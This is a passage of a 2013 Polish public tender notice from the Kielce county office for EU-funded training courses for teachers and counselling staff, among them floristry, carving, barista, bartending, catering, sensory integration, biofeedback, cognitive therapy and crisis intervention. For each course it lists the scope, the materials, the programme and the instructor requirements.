<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiat Kielecki - Starostwo Powiatowe w Kielcach 
Al. IX Wieków Kielc 3, 25-516 Kielce
budynek C-1, II-gie piętro, pokój 236.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.03.2013 godzina 10:00, miejsce: Powiat Kielecki - Starostwo Powiatowe w Kielcach 
Al. IX Wieków Kielc 3, 25-516 Kielce
budynek C-1, II-gie piętro, pokój 226 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane z EFS w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.4 Wysoko wykwalifikowane kadry systemu oświaty, Projekt pt Nowoczesne Kadry Oświaty w Powiecie Kieleckim..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs Florystyka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Beneficjent: nauczyciele przedmiotów zawodowych szkół i placówek oświatowych  powiatu kieleckiego
Liczba godzin: 50 
Termin realizacji:  II kw. 2014 r.
Liczba grup: 1 
Miejsce realizacji: powiatowe placówki oświatowe
Planowana liczba uczestników: 15
 Wykonawca zapewnia wszystkie niezbędne materiały do realizacji szkolenia, tj. 
- materiał florystyczny - kwiaty i zieleń dla każdego uczestnika  w ilości gwarantującej prowadzenie zajęć praktycznych , ćwiczeniowych
- materiały pomocnicze - krepa, kryzy, kosze, koszyki, plecionki, gąbki, pianka florystyczna, wstążki, rafia, klej florystyczny, podkłady, ratan, sznurki, faszyna, konstrukcje, papier, flizelina, patyki, gałązki, drewno, drut florystyczny, plastelina florystyczna, farby w sprayu, folia (rękaw foliowy, celofan, serweta), kora, faszyna, włókno, koraliki, perełki, piórka brokat, nabłyszczacz, utrwalacz, odświeżacz, organza, tiul, sizal, wełna, siatka florystyczna,  trawy, wstążki/ tasiemki dekoracyjne  i inne ozdoby nożyki do dekoracji, stojaki itp
Kurs florystyczny zapewnia odpowiednie przygotowanie, nie tylko przez poznanie tajników florystyki współczesnej i zdobycie wiedzy na temat roślin, ale także poprzez uzyskanie kompetencji społecznych związanych z, umiejętnościami organizacyjnymi, poczuciem estetyki. 
Cel:  Kurs florystyczny to połączenie zajęć praktycznych z teoretyczną nauką o florystyce, kurs przeznaczony jest dla nauczycieli przedmiotów zawodowych pragnących posiąść kompleksową wiedzę  
z florystyki, która jest podstawą do dalszego rozwoju i startu w zawodzie. Istotnym elementem kursu florystycznego jest duża ilość zajęć praktycznych, które pomogą utrwalić wszystkie aspekty przekazanej wiedzy
Program nauczania:  kurs trwa 50 godzin zegarowych (10 godzin zajęć teoretycznych oraz 40 godzin zajęć praktycznych)   i obejmuje następujące zagadnienia: 
Wprowadzenie, teoria barw i kompozycji, florystyczne zasady kompozycyjne, narzędzia florysty - materiałoznawstwo, specyfika pracy kwiaciarni, botanika - wprowadzenie materiał roślinny, metody suszenia                 i utrwalania roślin, florystyka okolicznościowa, sztuka układania kwiatów w naczyniach, dekoracja kwiatów doniczkowych, kosze kwiatowe, dekoracje stołów i wnętrz, artystyczne pakowanie prezentów, florystyka ślubna, florystyka żałobna, podstawy fotografii w florystyce 
Podstawowe zagadnienia z dziedziny florystyki.  Najważniejsze narzędzia stosowane we florystyce 
Materiały pomocnicze i techniki florystyczne. Środki do pielęgnacji roślin Kompozycja barw we florystyce (ogólne zasady kompozycji, elementy kompozycji. relacje między elementami kompozycji rodzaje kompozycji). Kompleksowe stosowanie zasad kompozycji (style kompozycji roślinnych, botanika i materiałoznawstwo roślinne).  Trendy we florystyce. Bukieciarstwo okolicznościowe
(wiązanki okolicznościowe, technika sporządzania wiązanek, bukiet dekoracyjny, standardowy  i mieszany) Układanie roślin w naczyniach (kompozycje roślinne w naczyniach, sposób cięcia roślin  i postępowanie                          z kwiatami ciętymi, układy z kwiatów). Pielęgnacja roślin doniczkowych (dekoracje z roślin doniczkowych, kryteria doboru roślin, pochodzenie roślin doniczkowych, warunki uprawy roślin doniczkowych, zabiegi pielęgnacyjne, pojemniki do roślin, rośliny ozdobne w szklanych naczyniach, stylizacja wnętrz roślinami doniczkowymi. Florystyka ślubna. (osobowość i wygląd panny młodej, dekoracje głowy panny młodej, przypinki, techniki wykonywania bukietów ślubnych, rodzaje wiązanek ślubnych, wiązanki dla świadków, wiązanki dla rodziców, dekoracje samochodu, dekoracja kościoła, dekoracja sali weselnej). Dekoracja stołów. Tworzenie stroików. Techniki suszenia i  utrwalania materiału roślinnego (suszenie roślin, metoda zielarska, sposoby suszenia roślin, metody utrwalania roślin, farbowanie bielenie) Projektowanie wystaw i ekspozycji
Kompetencje uzyskane w wyniku szkolenia:
Poznanie wiadomości teoretycznych z dziedziny florystyki
Nabycie umiejętności praktycznych w florystyce 
WYMAGANIA WOBEC KADRY
udział w co najmniej 2 ogólnopolskich/międzynarodowych konkursach/wystawach florystycznych
doświadczenie w przeprowadzeniu co najmniej 2 kursów z florystyki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.10.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dekoracja potraw-carving.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Beneficjent:  nauczyciele przedmiotów zawodowych szkół i placówek oświatowych  powiatu kieleckiego
Liczba godzin: 40 godz.
Termin realizacji: VI-VII 2013
Liczba grup:    1
Miejsce realizacji: powiatowe placówki oświatowe
Planowana liczba uczestników: 15
Materiały: Wykonawca zobowiązany jest zapewnić :
materiały zużywalne (produkty, surowce, owoce i warzywa itp.) niezbędne do przeprowadzenia zajęć praktycznych,
każdemu uczestnikowi kursu komplet narzędzi niezbędnych do prawidłowego przeprowadzenia kursu  (zestaw noży i akcesoriów do carvingu, min. nożyki, tarki, foremki, dłutka, oraz deski do krojenia, miski, ręczniki, ściereczki itp.),
odzież ochronną dla uczestników kursu oraz ściereczki bawełniane,
środki czystości potrzebne w trakcie realizacji zajęć praktycznych (m.in.: ręczniki papierowe, płyn do mycia naczyń, myjki, ściereczki, worki na śmieci).Cel: Celem szkolenia jest zapoznanie kursantów z narzędziami do carvingu, wykonywanie dekoracji  z warzyw i owoców, zastosowanie zasad rzeźbienia i podziału carvingu.Program szkolenia:  Historia i pochodzenie carvingu. Narzędzia do carvingu- rodzaje narzędzi, sposoby używania, zasady bezpieczeństwa. Wycinanie liści i kwiatów z różnych owoców i warzyw oraz tworzenie kompozycji  z wykonanych elementów. Czynniki decydujące o wyborze owoców warzyw do rzeźbienia. Różne techniki do rzeźbienia owoców i warzyw. Zasady tworzenia kompozycji z wykonanych elementów. Sposoby przechowywania wyrzeźbionych owoców i warzyw. Opis przykładowych materiałów wytworzonych przez uczestników szkolenia: 
Przykładowy materiał  powarsztatowy, na który składają się wytworzone przez uczestników w trakcie realizacji treści programowych - wytwory z owoców i warzyw takich jak: delfin z banana, palma  z papryki, lilia  z cebuli, kwiat z cebuli, 6 różnych ozdób z rzodkiewek, łabędź z jabłka, wachlarz  z jabłka, piwonia z jabłka, kokarda z cukinii, tulipan  z cytryny, róża z papryki, szyszka z pepperoni, kwiat  z pepperoni, liść z ogórka, liść z ogórka podwijany, liść z ogórka podwijany podwójny, róża  z kapusty pekińskiej, aster z kapusty pekińskiej, lilia z plastrów marchwi, lilia długie końce, lilia strzępiasta, begonia z białej rzodkwi, kwiat z plastrów kalarepy, lilia z pora, buława z pora, aster z pora, aster z pora wersja druga, dekoracja z korzonka pora, listki z pora, kogut z ananasów, paw z arbuza, żółw z arbuza, wóz z ananasa, róża z cukinii, róża z białej rzodkwi, drobne kwiatki z białej rzodkwi, kielich z ogórka, kalia z białej rzodkwi, róża z marchewki, szyszka z białej rzodkwi,  róża                        w melonie itp. zaproponowane przez wykonawcę.
WYMAGANIA WOBEC KADRY:
ukończony kurs carvingu I, II, III stopień
udział w ogólnopolskich/międzynarodowych  konkursach carvingu
posiadających udokumentowane doświadczenie  w przeprowadzeniu co najmniej 2 kursów z carvingów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.10.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs Barystyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Beneficjent  nauczyciele przedmiotów zawodowych szkół i placówek oświatowych  powiatu kieleckiego
Liczba godzin: 40 
Termin realizacji:  I kw. 2014 r.
Liczba grup: 1 
Miejsce realizacji: powiatowe placówki oświatowe
Planowana liczba uczestników:  15 osób. 
Materiały: uczestnicy otrzymują materiały szkoleniowe w formie papierowej 
Wykonawca zapewni sprzęt, przyrządy, urządzenia niezbędne do przeprowadzenia kursów, zgodne z  zaproponowanym programem. 
Wykonawca dostarcza na miejsce szkolenia  następujący sprzęt niezbędny do realizacji zadania:  (co najmniej w ilości gwarantującej prawidłową realizację szkolenia), ekspresy do kawy co najmniej 2 ekspresy 2 stanowiskowe , młynki do kawy, kawa w ilości odpowiednie do przeszkolenia powyższej grupy, dzbanki do spieniania mleka, porcelanę do trenowania kaw ( espresso, cappuccino),szkło do kaw smakowych, łyżeczki, odbijaki, tampery, kolby do ekspresu ( jedno i dwu porcjowe), mleko w ilości odpowiednie do przeszkolenia powyższej grupy, syropy do kaw smakowych, alkohole do kaw, bita śmietana, topping, posypki do kaw,  materiały do utrzymania czystości ekspresu i miejsc roboczych. Cel szkolenia: zdobycie wiedzy na temat profesjonalnego parzenia kawy i jej serwowania oraz poprawnej obsługi maszyn barowych.Podstawowy program nauczania: każdy dzień szkolenia BARYSTA podzielony jest na część teoretyczną i praktyczną. Kurs zawiera co najmniej 70%  zajęć praktycznych.Szkolenie BARISTA obejmie co najmniej następujące zagadnienia :w jaki sposób prawidłowo parzyć kawę,  przygotowywać koktajle mleczne, obsługiwanie  maszyn barowych  umiejętność jaką jest sztuka rysowania mlekiem. Kawa: historia kawy i jej początki, pochodzenie i budowa owocu kawowego,charakterystyka gatunków kaw na świecie. Proces produkcji kawy - ziarna: rodzaje metod zbioru kawy i ich wpływ na jakość,  metody suszenia i obróbki owocu kawy, technika wypalania kawy, zalety i wady tworzenia mieszanek kawowych, omówienie marek kawowych na rynku Polskim Barista:  początki zawodu barista na świecie, kwalifikacje i zakres obowiązków baristy - cechy dobrego baristy, sprzedaż sugestywna, serwowanie kawy gościom Maszyny barowe :wyposażenie i sprzęt niezbędny w pracy baristy, budowa, zasada działania, konserwacja oraz czyszczenie maszyn barowych, regulacja młynka do kawy Parzenie kawy metody parzenia kawy, parametry perfekcyjnego espresso- reguła 4m,  fazy ekstrakcji espresso- reguła 5-ciu filiżanek, najczęściej powtarzające się błędy przy parzeniu espresso,  przygotowanie różnych rodzajów espresso: classico, ristretto, lungo, doppio, macchiatto i inne. Napoje kawowe : mleko i jego właściwości- nauka spieniania, przygotowanie kaw mlecznych: cappuccino, latte i inne,  w duecie z kawą: syropy, bita śmietana,  alkohole Latte ART :  sztuka rysowania mlekiem
Ciekawostki o kawie :  najdroższa kawa świata,  kawa jako afrodyzjak,  kawa używana w kuchni do gotowania i pieczenia,  łączenie kawy z deserami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.10.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs  Barmański.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Beneficjent:  nauczyciele przedmiotów zawodowych szkół i placówek oświatowych  powiatu kieleckiego
Liczba godzin: 40 
Termin realizacji: X -XI 2013r.
Liczba grup: 1 
Miejsce realizacji: powiatowe placówki oświatowe
Planowana liczba uczestników: 20
WYKONAWCA  ZAPEWNI  pełny asortyment sprzętu barmańskiego podręcznego  oraz urządzenia typu: kostkarka (zabezpieczenie lodu), młynek do lodu, blender, pełny asortyment szkła do drinków wszystkich typów i rodzajów,  każdego rodzaju po co najmniej 20  szt. aby każdy uczestnik posiadał swój zestaw do ćwicze z shakerem do mieszania dla każdego, owoce do dekoracji w ilości co najmniej 15 rodzajów owoców różnych, alkoholi co najmniej 60 butelek różnych rodzajów wódek od wytrawnych po słodkie, pełny asortyment syropów barmańskich 15 rodzajów smakowych, soki owocowe i napoje gazowane różnych smaków też co najmniej 15 smaków,
Kompetencje uczestnika :
Po szkoleniu uczestnik  posiadał będzie wiedzę i umiejętności praktyczne z zakresu Mixologii, Dekoracji i Sztuki Prezentacji. 
Posiądzie umiejętności praktyczne w tym sztuczki barmańskiej które sprawią iż stanie się on profesjonalnym nauczycielem - barmanem.
Otrzyma certyfikat ukończenia kursu barmańskiego
Program kursu:  Zarys technologii i towaroznawstwa napojów .Stowarzyszenia barmańskie, etyka zawodu barmana. Przegląd towaroznawczy wódek (Wódki polskie, Whisky,  Gin,  Rum) Towaroznawstwo i technologia likierów. Historia napojów mieszanych. Genealogia napojów mieszanych ( historia cocktail francuskich, historia cocktail angielskich, historia cocktail USA)   Historia cocktaili na wybranych przykładach. Charakterystyka napojów mieszanych (fizjologia napojów mieszanych, schemat wzajemnego kojarzenia się składników, cocktaile na bazie wódki, cocktaile na bazie whisky, cocktaile na bazie ginu, cocktaile na bazie rumu) Drinki sławnych barów i mistrzów świata. Organizacja baru (typy barów, urządzenia i sprzęt meblowy będące na wyposażeniu baru, wykaz składników obowiązujących w barach, miary barowe) Technika mieszania napojów gorących (podstawowe zasady sporządzania napojów gorących, wygrzewanie szkła i sposoby flambirowania napojów, sporządzanie napojów gorących na wybranych przykładach ( np: grog, krupnik, punch, mull, sangaree). Technika mieszania napojów zimnych  (kolejność czynności sporządzania napojów zimnych, niezbędny sprzęt wykorzystywany w technice mieszania napojów zimnych,-shakery, blender, szkalnica barmańska)  Technika miksowania cocktaili co najmniej  20 g. Propedeutyka miksologii. Podstawowe elementy techniki miksowania. Podstawowe sposoby i metody miksowania ( shaking, blending, building).  Technika miksowania cocktaili (cocktaile na bazie wódki czystej, cocktaile na bazie whisky, cocktaile na bazie ginu,  cocktaile na bazie rumu, cocktaile na bazie tequili.) Dodatki uzupełniające oraz zamienniki używane w miksologi: modyfikatory (likiery, kremy), bonifikatory (bittersy)
Zagwarantowanie podręcznika dla każdego uczestnika szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.10.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Organizacji imprez cateringowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Beneficjent:  nauczyciele przedmiotów zawodowych szkół i placówek oświatowych  powiatu kieleckiego
Liczba godzin: 40 
Termin realizacji:  IV kw. 2014r.
Liczba grup: 1 
Miejsce realizacji: powiatowe placówki oświatowe
Planowana liczba uczestników: 15
Kurs oferuje pogłębienie wiedzy nauczycieli przedmiotów zawodowych,  podniesienie umiejętności w zakresie fachowej, kompleksowej obsługi konsumenta,  także podczas wszelkiego rodzaju bankietów, czy przyjęć okolicznościowych. W procesie szkoleniowym należy zwrócić szczególną uwagę na kształtowanie zasad etyki i kultury zawodowej, prawidłowych postaw, nawyków, sposobu komunikowania się i reagowania na życzenia konsumenta.
Cel: nabycie wiedzy i umiejętności z zakresu świadczenia kompleksowych usług gastronomicznych  i organizacji imprez cateringowych. 
Program nauczania: Przepisy BHP na stanowiskach pracy, zasady i style kompozycji roślinnych, aranżacja stołów i Sali, stroiki i dekoracje świąteczne, kompozycje w naczyniach, zasady racjonalnego żywienia, jednostki organizacyjne zakładu gastronomicznego (restauracja, kawiarnia, bary, kuchnie), stanowisko pracy w zakładzie gastronomicznym (Menager restauracji, kelner, szef kuchni, barman itd.), zakres obowiązków kierownika Sali, kelnera, kuchni. Kuchnia zimna, kuchnia gorąca, kuchnia bankietowa, dział organizacji imprez gastronomicznych, organizowanie bankietów i działalność cateringowa, usługi cateringowe - od oferty do działań posprzedażowych, planowanie cateringu: rodzaje i forma serwisu, wybór odpowiedniego miejsca, sprzęt niezbędny do wykonania usługi, wiedza kulinarna - właściwy dobór dań, karta zaproszenia, kalkulacja. realizacja usługi cateringowej. Catering w ujęciu marketingowym i sprzedażowym: tworzenie oferty handlowej zaspokajającej potrzeby docelowego nabywcy, promocja i techniki sprzedaży. Prawne aspekty realizacji usług cateringowych: bezpieczeństwo żywności, organizacja imprez masowych. Obsługa konsumenta, przyjęcia okolicznościowe, zasady i techniki nakrywania stołów do potraw i napojów. Transport posiłków w czasie cateringu - zasady przechowywania wydawania i dystrybucji potraw
Kompetencje:
Pogłębienie wiedzy i doskonalenie umiejętności w zakresie profesjonalnej realizacji usług cateringowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.10.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Integracja sensoryczna I i II  stopnia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Beneficjent: pracownicy pedagogiczni poradni psychologiczno pedagogicznych powiatu kieleckiego Miejsce realizacji: powiatowe placówki oświatowe. OPIS I stopnia i II stopnia. Liczba godzin po 40 dla każdego stopnia. Termin realizacji: I st. IX-XI 2013r., II st. I KW 2014 r. Liczba grup po jednej grupie w każdym stopniu. Planowana liczba uczestników po 10 w każdym stopniu. Zakres i tematyka: Neurobiologiczne podstawy Integracji Sensorycznej. Metoda Integracji Sensorycznej we wspomaganiu rozwoju mowy u dzieci z uszkodzeniami ośrodkowego układu nerwowego.Metody diagnozy SI. Planowanie pracy terapeutycznej. Praktyczne zastosowanie metody SI w stymulacji i terapii dzieci z zaburzeniami rozwoju.Ramowy plan zajęć, wykłady i zajęcia praktyczne. Wprowadzenie do Teorii Integracji Sensorycznej. Budowa i działanie ośrodkowego układu nerwowego. Budowa i działanie systemów sensorycznych. Wpływ integracji wrażeń przedsionkowych i proprioceptywnych na funkcjonowanie człowieka. Zaburzenia modulacji sensorycznej. Zaburzenia integracji wrażeń przedsionkowych i proprioceptywnych.  Dyspraksja. Zaburzenia systemów zmysłowych w świetle Teorii Integracji Sensorycznej i ich wpływ na funkcjonowanie dziecka.  Sensomotoryczna stymulacja systemów zmysłowych. Zależności między procesami SI a rozwojem zdolności słuchowo językowych. Metody diagnozy integracji sensorycznej. Prowadzenie badań diagnostycznych. Planowanie pracy terapeutycznej.Kompetencje uzyskane w wyniku szkolenia. Poznanie założeń teoretycznych Metody Integracji Sensorycznej. Nabycie umiejętności posługiwania się metodami diagnostycznymi SI. Nabycie umiejętności tworzenia sekwencji oraz prowadzenia zajęć. Po zakończeniu szkolenia I stopnia  uczestnik uzyskuje stosowane zaświadczenie. Po zakończeniu szkolenia II stopnia uczestnik uzyskuje certyfikat..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.52.11.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Biofeedbaback( część osób II st, III st).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Beneficjent: pracownicy pedagogiczni poradni psychologiczno pedagogicznych powiatu kieleckiego
Termin realizacji  VI-VII 2013r.
Liczba godzin 40 
Liczba grup 1 
Miejsce realizacji: powiatowe placówki oświatowe
Planowana liczba uczestników łącznie 15 os.
Praca na sprzęcie EEG DigiTrack 
Zakres i tematyka: Doskonalenie wiedzy z zakresu czynności bioelektrycznej mózgu.Metoda EEG Biofeedback we wspomaganiu pracy mózgu. Planowanie pracy terapeutycznej. Praktyczne zastosowanie metody EEG - Biofeedback  w stymulacji i terapii dzieci z zaburzeniami rozwoju. Kompetencje uzyskane w wyniku szkolenia Doskonalenie  umiejętności posługiwania się sprzętem i oprogramowaniem metody. Doskonalenie umiejętności planowania terapii I prowadzenia treningów w pasie centralnym. Nabycie umiejętności planowania terapii i prowadzenia treningów w innych punktach niż C3 i C4. Po zakończeniu szkolenia uczestnik uzyskuje stosowne zaświadczenie.
Plan szkolenia:
Wykłady ( uzupełnienie wiedzy z zakresu czynności bioelektrycznej mózgu, EEG Biofeedback- uzupełnienie informacji technicznych, rytmy okołodobowe (w kontekście jak zaplanować czasowo treningi EEG Biofeedback), modyfikacja czynności bioelektrycznej przez leki, suplementy diety i używki - uzupełnienie wiadomości .
EEG Biofeedbck - praktyka terapii (badania zalecane przed rozpoczęciem treningu, przeciwwskazania do treningów EEG Biofeedback, normy parametrów)
Zajęcia praktyczne 
doskonalenie umiejętności pracy z programem EEG Biofeedback ( amplituda, przesuw w pasie centralnym (kiedy I jak stosować?, filtry, impedancja - pomiar)
interpretacja wyników badania EEG - Biofeedback.
interpretacja wyników treningów (omówienie konkretnych przypadków)
ustawienia programu (wybór punktu pod elektrodę - w innych punktach niż C3 i C4. , ustawianie zakresów częstotliwości, wybór protokółu badani
ustawienia sesji i rund
wybór gry
zapoznanie się z parametrami nowych gier..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.10.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Kurs terapii poznawczej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Beneficjent:  pracownicy pedagogiczni poradni psychologiczno pedagogicznych powiatu kieleckiego
Liczba godzin 40 
Termin realizacji III kw. 2014 r.
Liczba grup 1 
Miejsce realizacji: powiatowe placówki oświatowe
Planowana liczba uczestników 15 os
Zakres i tematyka:
specyfika terapii poznawczo-behawioralnej u dzieci i młodzieży w zależności od okresu rozwojowego.
umiejętność przeprowadzenia diagnozy behawioralnej dzieci i młodzieży pod kątem terapii, doboru metod.
poznanie podstawowych technik behawioralnych w zależności od rodzaju zaburzeń.
umiejętność ułożenia programu pracy z dzieckiem- dostosowanego do objawów, ale również wskazówek dla rodziców.
poznanie kilku modeli pracy z dzieckiem, np. w przypadku ADHD, zaburzeń lękowych, zaburzeń zachowania. Warsztaty związane z praktycznym stosowaniem technik, możliwość obserwacji zajęć prowadzonych przez terapeutę.
materiały dla uczestników obejmujące praktyczne instrukcje, rozwiązania  dotyczące niektórych problemów, materiały z ćwiczeniami dla rodziców, itp.
Cel: Celem szkolenia jest zapoznanie uczestników z poznawczą koncepcją lęku oraz poznawczo-behawioralnymi metodami pracy z lękiem. Uczestnicy przećwiczą tworzenie poznawczej konceptualizacji problemów lękowych i zaplanują odpowiednią terapię.Szkolenie intensywne i wymagające  od uczestników dużej aktywności.Program  szkolenia: Klasyfikacja zaburzeń lękowych. Poznawcze koncepcje lęku. Teoria schematów poznawczych wg Becka. Rola myślenia w zaburzeniach lękowych. Czynniki wpływające na lęk   i podtrzymujące go. Podstawowe metody pracy z lękiem. Programy terapeutyczne bazujące na teorii poznawczo-behawioralnej: Coping Cat, FRIENDS. Konceptualizacja problemu zaburzenia lękowego u dziecka, zaplanowanie interwencji. Przećwiczenie niektórych technik behawioralnych i poznawczych pracy z lękiem. Trening relaksacyjny. Włączanie rodziców do CBT. Analiza przypadku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.10.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Kurs Interwencje w sytuacjach kryzysowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Beneficjent: pracownicy pedagogiczni poradni psychologiczno pedagogicznych powiatu kieleckiego
Liczba godzin 40 
Termin realizacji  V-VII 2013r.
Liczba grup 1 
Miejsce realizacji: powiatowe placówki oświatowe
Planowana liczba uczestników 20 os
Szkolenie z zakresu interwencji kryzysowej 
Cel szkolenia z zakresu interwencji kryzysowej z punktu widzenia pracownika poradni psychologiczno-pedagogicznej: akcent na sytuacje dotyczące dzieci i młodzieży, poznanie koncepcji procesu pomocy psychologicznej i czynników decydujących o skuteczności pomocy, modeli oraz strategii interwencji kryzysowej, poznanie metod łagodzących objawy reakcji kryzysowej, przywrócenie równowagi psychicznej, zapobieżenie przejściu ostrego kryzysu w stan chroniczny, wskazówki dla rodziców opiekunów, nauczycieli po zaistnieniu określonej sytuacji, podstawowe kroki w zakresie przywrócenia danej osobie umiejętności samodzielnego radzenia sobie, poznanie zasad postępowania z osobą przeżywającą kryzys. Osobiste przygotowanie do pomagania, elementy treningu osobistego, interpersonalnego i intrapersonalnego, samopoznanie w celu lepszego rozumienia i ulepszania własnego funkcjonowania.   Rodzaje kryzysów (analiza przypadków)
kryzysy rozwojowe, głównie dotyczące dzieci i młodzieży, np. związane z trudnościami szkolnymi
kryzysy sytuacyjne (doświadczenia traumatyczne, napaść, przemoc seksualna, utrata i żałoba, próby samobójcze, kryzysy związane z chorobą, uzależnieniami, przemocą, agresją).
Fazy kryzysu. Etapy interwencji kryzysowej - opracowanie procedury pracy poradni. Grupowe metody pomocy psychologicznej podczas interwencji kryzysowych w szkole. Kompleksowa odpowiedź na potrzeby osoby w kryzysie: pomoc psychologiczna, materialno-bytowa, prawna, medyczna, społeczna, informacyjna (adresy instytucji pomocowych z naszego rejonu - materiały dla uczestników szkolenia). Radzenie sobie ze stresem i obciążeniami wynikającymi z bycia osobą udzielającą pomocy   w interwencji kryzysowej.
Metody prowadzenia zajęć, zajęcia o charakterze praktycznym , w oparciu o ćwiczenia
- wykład, prezentacja
- studium przypadku przykłady z praktyki klinicznej
- ćwiczenia w podgrupach i parach
-wspólna analiza materiałów 
- prezentacja audiowizualna
- aktywna dyskusja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.10.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Tablica interaktywna w nauczaniu przedmiotów humanistycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Beneficjent:  nauczyciele zatrudnieni w placówkach oświatowych powiatu kieleckiego
Termin realizacji: IV- V. 2013r.
Liczba godzin: 40 godz.
Miejsce realizacji: powiatowe placówki oświaty
Planowana liczba uczestników: 20  os.
Minimalny program nauczania 
Rozwijanie kompetencji merytorycznych i metodycznych nauczycieli w zakresie wykorzystywania w swojej pracy dydaktycznej tablicy interaktywnej
Cel: Celem szkolenia jest podniesienie kwalifikacji pracowników oświaty w zakresie efektywnego, kreatywnego wykorzystania tablic interaktywnych w nauczaniu przedmiotów humanistycznych. Szkolenie ma na celu zapoznanie uczestników z możliwościami urządzenia, jakim jest tablica interaktywna.
